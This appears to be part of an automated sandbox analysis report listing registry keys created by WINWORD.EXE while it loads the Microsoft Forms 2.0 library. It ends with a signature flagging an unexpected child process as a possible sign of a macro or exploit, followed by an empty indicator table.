Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\0\win32	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\HELPDIR	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{440673D2-DAE4-477C-94AD-C8BC73AE4D33}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
